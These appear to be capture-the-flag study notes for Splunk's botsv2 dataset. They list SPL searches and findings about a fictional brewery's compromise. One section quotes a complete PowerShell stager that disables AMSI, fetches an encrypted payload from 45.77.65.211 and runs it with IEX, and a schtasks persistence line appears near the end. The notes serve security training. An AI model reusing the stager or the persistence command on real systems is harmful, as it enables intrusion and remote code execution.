v2

metadata - Splunk Documentation

MetaData > MetaLoreSplunk-Blogs

100 series questions

Count all events

| metadata type=sourcetypes index=botsv2

| eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S")

| eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S")

| eval recentTime=strftime(recentTime,"%Y-%m-%d %H:%M:%S")

| sort - totalCount

• index="botsv2" amber

• index="botsv2" sourcetype="pan:traffic"

  • 10.0.1.200

  • 10.0.2.101

  • 71.39.18.125

• index="botsv2" Amber src_user="frothly.local\amber.turing" | reverse

• index="botsv2" 10.0.2.101 *beer* sourcetype="stream:HTTP" | dedup site | table _time site

• index="botsv2" 10.0.2.101 sourcetype="stream:HTTP" www.berkbeer.com | table _time uri_path

• index="botsv2" *berk* "method{}"=MAIL

  • index="botsv2" mberk@berkbeer.com

  • index="botsv2" aturing@froth.ly

  • index="botsv2" | search "Heinz Bernhard Contact Information"

    • ambersthebest@yeastiebeastie.com

      • Amber Turing

    • mberk@berkbeer.com

      • Martin Berk

    • aturing@froth.ly

      • Amber Turing

    • hbernhard@berkbeer.com

      • Heinz Bernhard

index="botsv2" | search "@berkbeer.com"

hint

200 series questions

• index="botsv2" Amber TOR

• index="botsv2" brewertalk.com

• index="botsv2" brewertalk.com http_comment="HTTP/1.1 404 Not Found" | table _time src_ip src_header uri_path http_method | stats count by src_ip

  • 45.77.65.211

• index="botsv2" 52.42.208.228 | stats count by uri_path

• index="botsv2" 52.42.208.228 | dedup form_data | table form_data

  • kIagerfield

• index="botsv2" member.php SQL | stats count by form_data

• index="botsv2" kevin | dedup cookie | table cookie src_ip dest_ip

300 series questions

• index="botsv2" Mallory .pptx | dedup filename | table _time filename

• index="botsv2" host="MACLORY-AIR13" .pptx

  • /Volumes//FROTHLY/Home/mallory.kraeusen/Frothly_marketing_campaign_Q317.pptx

  • /Users/mallorykraeusen/Documents/

index="botsv2" mallory MACLORY-AIR13

• index="botsv2" Mallory .crypt | dedup filename | table _time filename

• index="botsv2" .mkv

• index="botsv2" host="MACLORY-AIR13" ".crypt" sourcetype=ps

• index="botsv2" kutekitten | search vendor action=added

  • columns.vendor_id

    • 
  • Google that ID

• index="botsv2" kutekitten.local mkraeusen | dedup columns.md5 | table columns.name columns.path columns.value name columns.cmdline columns.md5

  • befa9bfe488244c64db096522b4fad73fc01ea8c4cd0323f1cbdee81ba008271

  • 72d4d364ed91dd9418d144a2db837a6d

  • https://www.virustotal.com/gui/file-analysis/NzJkNGQzNjRlZDkxZGQ5NDE4ZDE0NGEyZGI4MzdhNmQ6MTY5MDk4OTIwMw==

• index="botsv2" befa9bfe488244c64db096522b4fad73fc01ea8c4cd0323f1cbdee81ba008271

  • /Users/mkraeusen/Downloads/Important_HR_INFO_for_mkraeusen

• Last 2 are here:

  • 

400x series questions

• index=botsv2 *.zip

  • C:\Users\billy.tun\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\4RND1WK1\invoice.zip

  • 2017-08-24 03:27:29.947

• index=botsv2 invoice.zip

  • check email content

• index=botsv2 SSL app=ssl

  • ssl_issuer

• index=botsv2 Frothly winsys32.dll

[Ref].AsSEmbLY.GetTYPE('System.Management.Automation.AmsiUtils')|? {
    $_
}

|% {
    $_.GeTFIeLd('amsiInitFailed', 'NonPublic,Static').SEtVaLUE($nULl, $TRuE)
};
[SYstem.NEt.SERvICEPOInTMAnagER]::EXPEct100ContiNue = 0;
$wC = NEW - ObjECt SYsTeM.NeT.WEbCliEnt;
$u = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {
    $true
};
$wc.HeAdeRS.AdD('User-Agent', $u);
$WC.Proxy = [SySTEm.Net.WeBREQUeSt]::DEfAulTWeBProxY;
$Wc.PROxy.CReDeNtIalS = [SystEm.NEt.CrEdEntiaLCacHe]::DeFAuLtNetWORkCREDeNtIAls;
$K = [SystEm.Text.EncODIng]::ASCII.GeTByTeS('389288edd78e8ea2f54946d3209b16b8');
$R = {
    $D, $K = $ARgs;
    $S = 0..255;
    0..255|% {
        $J = ($J + $S[$_] + $K[$_%$K.CouNt])%256;
        $S[$_], $S[$J] = $S[$J], $S[$_]
    };
    $D|% {
        $I = ($I + 1)%256;
        $H = ($H + $S[$I])%256;
        $S[$I], $S[$H] = $S[$H], $S[$I];
        $_ - BxOR$S[($S[$I] + $S[$H])%256]
    }

};
$wc.HeadERs.ADd("Cookie", "session=lrtRHKkA6IL5h/d8Ekk6QsxyPvk=");
$ser = 'https://45.77.65.211:443';
$t = '/admin/get.php';
$DATA = $WC.DoWNLoaDDATA($SER + $T);
$iV = $DAta[0..3];
$DatA = $dATa[4..$DaTa.lENGTh];
 - JoIN[CHar[]](& $R $daTa ($IV + $K))|IEX

https://www.virustotal.com/gui/ip-address/45.77.65.211/relations

• index="botsv2" winsys32.dll

  • Shows what program is used

• index="botsv2" sourcetype="stream:ftp"

  • Shows used program activity

• index="botsv2" sourcetype="stream:ftp" method=RETR | dedup filename | table filename

  • Will expose the filename

index="botsv2" schtasks.exe

C:\Windows\system32\schtasks.exe" /Create /F /RU system /SC DAILY /ST

HKLM:\Software\Microsoft\Network debug